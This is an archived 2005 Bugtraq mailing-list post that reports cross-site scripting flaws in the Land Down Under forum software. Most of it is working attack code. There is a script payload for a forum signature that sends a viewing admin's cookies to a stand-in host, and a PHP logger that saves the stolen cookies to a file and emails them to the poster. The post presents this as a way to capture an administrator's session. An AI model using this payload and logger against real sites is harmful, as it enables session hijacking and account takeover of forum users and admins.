Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Land Down Under
From: bendeniz_avci () hotmail com
Date: 28 Aug 2005 07:55:34 -0000
Bug finder:spyMASter
Web site:Realhackers.net
Contact:bendeniz_avci () hotmail com

LDU has some xss vulns 
Firstly you can use html codes in your signature you can get cookies with this
put your signature that code

<SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>

and post a topic to forum when admin look this  topic she/he redirect and you can get cookie

this is codes of ekle.php you can save cookie to a  with this php code


<?php
$kayit = fopen("spymaster.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail("bendeniz_avci () hotmail com","your cookie ready","http://www.realhackers.net/spyoku.txt";,'From: spymaster () 
realhackers net');
?>

  By Date           By Thread  

Current thread:
  • Land Down Under bendeniz_avci (Aug 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]